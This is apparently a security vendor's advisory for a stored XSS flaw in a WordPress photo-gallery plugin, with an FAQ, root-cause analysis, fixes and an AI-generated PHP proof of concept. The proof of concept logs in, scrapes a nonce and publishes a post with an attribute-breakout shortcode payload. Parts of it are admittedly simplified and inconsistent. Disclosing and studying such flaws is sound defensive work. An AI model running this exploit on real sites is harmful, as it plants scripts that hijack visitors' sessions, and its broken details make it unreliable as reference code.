What is CVE-2026-4085?

CVE-2026-4085 is a stored cross-site scripting (XSS) vulnerability in the Easy Social Photos Gallery plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject arbitrary web scripts via the ‘wrapper_class’ shortcode attribute.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization when processing the ‘wrapper_class’ attribute. The plugin uses sanitize_text_field() instead of esc_attr(), allowing attackers to break out of the class attribute and inject malicious scripts that execute when users visit the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Easy Social Photos Gallery plugin version 3.1.2 or earlier is affected. Administrators should check their installed plugins for this version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Easy Social Photos Gallery plugin installed on your WordPress site. If it is version 3.1.2 or earlier, your site is vulnerable and should be addressed immediately.

What is the recommended remediation for this vulnerability?

The immediate fix involves changing the output escaping for the ‘wrapper_class’ attribute from sanitize_text_field() to esc_attr(). Additionally, site administrators should disable or remove the plugin until an updated version is released.

What does a CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it poses a significant risk as it can lead to serious consequences such as session hijacking or credential theft.

What are the practical risks of this vulnerability?

Successful exploitation allows attackers to inject JavaScript into pages, which can lead to session hijacking, credential theft, or site defacement. The attack executes in the context of the logged-in user’s session, increasing the risk of privilege escalation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated contributor can exploit the vulnerability by creating a post with a malicious shortcode. This demonstrates how the injected payload can break out of the ‘wrapper_class’ attribute and execute arbitrary scripts in the browser of any visitor.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Easy Social Photos Gallery plugin available to address CVE-2026-4085. Administrators should monitor for updates from the plugin developer and take immediate action to disable or remove the plugin.

What should I do if I cannot remove the plugin immediately?

If immediate removal is not possible, consider restricting access to the WordPress admin area and monitoring user roles closely. Additionally, implement a web application firewall (WAF) to help mitigate potential exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-4085: Easy Social Photos Gallery <= 3.1.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'wrapper_class' Shortcode Attribute (my-instagram-feed)

CVE ID CVE-2026-4085

Plugin my-instagram-feed

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.1.2

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4085 (metadata-based):

This vulnerability is a Stored Cross-Site Scripting (XSS) issue in the Easy Social Photos Gallery plugin for WordPress, affecting versions up to and including 3.1.2. The flaw resides in the ‘wrapper_class’ shortcode attribute of the ‘my-instagram-feed’ shortcode. Authenticated attackers with contributor-level access or higher can exploit this to inject arbitrary web scripts that execute when a user visits an injected page. The CVSS score is 6.4, indicating medium severity with a network attack vector and low privileges required.

Root Cause:
The plugin uses sanitize_text_field() instead of esc_attr() when outputting a shortcode attribute inside a double-quoted HTML class attribute. sanitize_text_field() removes many dangerous characters but does not encode double quotes. This allows an attacker to break out of the class attribute string by injecting a double quote. The description confirms this specific behavior. Atomic Edge analysis infers that the plugin processes shortcode attributes like ‘wrapper_class’ from user input, likely within a PHP function that generates the feed HTML. The shortcode handler collects attributes, applies sanitize_text_field(), and then directly echoes them into the class attribute without proper output escaping. This is a classic example of CWE-79 where improper neutralization leads to stored XSS.

Exploitation:
An attacker with contributor-level access can create or edit a WordPress post or page and insert the vulnerable shortcode. The attack vector is the ‘my-instagram-feed’ shortcode with a malicious ‘wrapper_class’ value. For example, the shortcode would be: [my-instagram-feed wrapper_class=”classname”>alert(‘XSS’)<div class=""]. When the plugin generates the HTML, the injected double quote breaks out of the class attribute, allowing the attacker to close the tag and inject arbitrary HTML event handlers or script tags. The payload executes in the browser of any visitor to that page. No specific AJAX action or REST endpoint is involved; the attack occurs via WordPress's built-in shortcode parsing during page rendering.

Remediation:
The fix requires changing the output escaping for the 'wrapper_class' attribute from sanitize_text_field() to esc_attr(). esc_attr() encodes double quotes as ", preventing attribute breakout. Additionally, the plugin should use WordPress's built-in shortcode attribute validation, such as wp_kses() or allow only predefined CSS class characters. Since no patched version is available, site administrators should disable or remove the plugin immediately until an update is released.

Impact:
Successful exploitation allows authenticated attackers to inject arbitrary JavaScript into pages. This stored XSS can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack executes in the context of the logged-in admin's session, potentially allowing privilege escalation if an admin views the page. Given the plugin's purpose as a social media gallery, injected pages with malicious scripts could affect site visitors and compromise the site's integrity.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4085 - Easy Social Photos Gallery <= 3.1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wrapper_class' Shortcode Attribute

/*
 * This PoC demonstrates how an authenticated contributor-level user can exploit the stored XSS
 * by creating a post with the malicious shortcode. The payload breaks out of the 'wrapper_class' attribute.
 * Replace $target_url, $username, and $password with valid credentials.
 */

$target_url = 'http://example.com'; // Target WordPress site URL (no trailing slash)
$username = 'contributor'; // WordPress username with contributor role
$password = 'password'; // User password

// Step 1: Authenticate and get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
curl_close($ch);

// Step 2: Get the _wpnonce for post creation. First, fetch the post-new.php page.
$post_new_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_new_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce from the admin-ajax.php?action=… pattern or from the page source.
// Simplified: assume we can find it. In a real scenario, parse for 'wp_nonce' value.
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)" />/', $response, $matches);
if (isset($matches[1])) {
    $nonce = $matches[1];
} else {
    die('Failed to extract nonce. Manual cookie import may be needed.');
}

// Step 3: Create a new post with the malicious shortcode.
// XSS payload: double quote closes the class attribute, then injects an event handler.
$payload = '" onclick="alert(1)" data-x="';
$post_content = '[my-instagram-feed wrapper_class="' . $payload . '"]';

$post_data = array(
    'post_title' => 'Test PoC CVE-2026-4085',
    'content' => $post_content,
    'post_status' => 'publish',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    'action' => 'editpost',
    'originalaction' => 'editpost',
    'wp_http_referer' => $target_url . '/wp-admin/post-new.php'
);

$admin_post_url = $target_url . '/wp-admin/admin-ajax.php?action=editpost'; // simplified; actual handler is admin-post.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
curl_close($ch);

echo "Post created with malicious shortcode. Visit the post to trigger XSS.n";
?>

Frequently Asked Questions

What is CVE-2026-4085?
Understanding the vulnerability
CVE-2026-4085 is a stored cross-site scripting (XSS) vulnerability in the Easy Social Photos Gallery plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject arbitrary web scripts via the ‘wrapper_class’ shortcode attribute.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization when processing the ‘wrapper_class’ attribute. The plugin uses sanitize_text_field() instead of esc_attr(), allowing attackers to break out of the class attribute and inject malicious scripts that execute when users visit the affected page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Easy Social Photos Gallery plugin version 3.1.2 or earlier is affected. Administrators should check their installed plugins for this version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Easy Social Photos Gallery plugin installed on your WordPress site. If it is version 3.1.2 or earlier, your site is vulnerable and should be addressed immediately.
What is the recommended remediation for this vulnerability?
Fixing the issue
The immediate fix involves changing the output escaping for the ‘wrapper_class’ attribute from sanitize_text_field() to esc_attr(). Additionally, site administrators should disable or remove the plugin until an updated version is released.
What does a CVSS score of 6.4 indicate?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it poses a significant risk as it can lead to serious consequences such as session hijacking or credential theft.
What are the practical risks of this vulnerability?
Potential impacts on the site
Successful exploitation allows attackers to inject JavaScript into pages, which can lead to session hijacking, credential theft, or site defacement. The attack executes in the context of the logged-in user’s session, increasing the risk of privilege escalation.
How does the proof of concept demonstrate the vulnerability?
Illustrating the exploitation method
The proof of concept shows how an authenticated contributor can exploit the vulnerability by creating a post with a malicious shortcode. This demonstrates how the injected payload can break out of the ‘wrapper_class’ attribute and execute arbitrary scripts in the browser of any visitor.
Is there a patch available for this vulnerability?
Current status of the plugin
As of now, there is no patched version of the Easy Social Photos Gallery plugin available to address CVE-2026-4085. Administrators should monitor for updates from the plugin developer and take immediate action to disable or remove the plugin.
What should I do if I cannot remove the plugin immediately?
Mitigation strategies
If immediate removal is not possible, consider restricting access to the WordPress admin area and monitoring user roles closely. Additionally, implement a web application firewall (WAF) to help mitigate potential exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations